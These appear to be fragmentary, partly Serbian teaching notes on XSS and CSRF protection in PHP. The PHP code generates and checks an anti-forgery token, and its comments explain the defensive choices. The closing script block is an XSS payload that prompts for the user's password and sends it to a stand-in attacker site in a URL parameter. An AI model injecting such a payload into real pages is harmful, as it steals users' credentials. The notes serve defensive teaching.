Cross-Site-Scripting (XSS (emitovanje, skripte, klijentsko, neželjeno),…
Cross-Site-Scripting
-
-
-
-
tokenizacija
generisanje
-
-
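// Generate a per-session anti-forgery token and keep a copy server-side.
//
// random_bytes() draws from the operating system's CSPRNG. The older recipe
// md5(uniqid(rand(), true)) combines the current time with non-cryptographic
// generators, so its output is far easier to predict; hashing it with md5()
// adds no entropy. bin2hex() turns the 32 random bytes into 64 hex characters,
// which can be placed in an HTML attribute as-is.
session_start();
$token = bin2hex(random_bytes(32));
// Straight quotes are required here: the typographic ’ is not a PHP string
// delimiter, so ’token’ would be read as a constant name rather than a key.
$_SESSION['token'] = $token;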
?>
<!-- Checkout form: the hidden field returns the session's anti-forgery token
     with the POST so that the handler can compare it with its stored copy.
     $token is written without output encoding; NOTE(review): that is safe only
     while the value is server-generated hex. Confirm this, or pass the value
     through htmlspecialchars() before echoing it. -->
<form method="POST" action="checkout.php">
  <input name="token" type="hidden" value="<?= $token ?>">
</form>
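// Run the protected action only when the submitted token matches the one
// stored in the session.
//
// is_string() rejects array-valued input (e.g. a token[] field), which
// hash_equals() would otherwise refuse with a TypeError.
// hash_equals() replaces ==: it compares in constant time and does no type
// juggling, whereas == treats numeric-looking strings such as "0e1" and "0e2"
// as equal.
// Straight quotes replace the typographic ’, which PHP does not accept as a
// string delimiter.
if (isset($_SESSION['token'], $_POST['token'])
&& is_string($_SESSION['token']) && is_string($_POST['token'])
&& hash_equals($_SESSION['token'], $_POST['token']))
{...}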
-
<script>
// Illustration of what an injected script can do once a page renders untrusted
// input as markup: it opens a browser prompt asking for the user's password
// (the Serbian text reads "Please enter your password") and then navigates the
// page to another site ("napadacevSajt" = "the attacker's site") with the typed
// value in the `sifra` ("password") query parameter.
// Defensive takeaways: encode untrusted data for the context in which it is
// rendered so it can never become a <script> element, and apply a
// Content-Security-Policy that disallows inline script.
odgovor = window.prompt("Molimo unesite Vasu sifru",""); document.location="napadacevSajt?sifra=" + odgovor;
</script>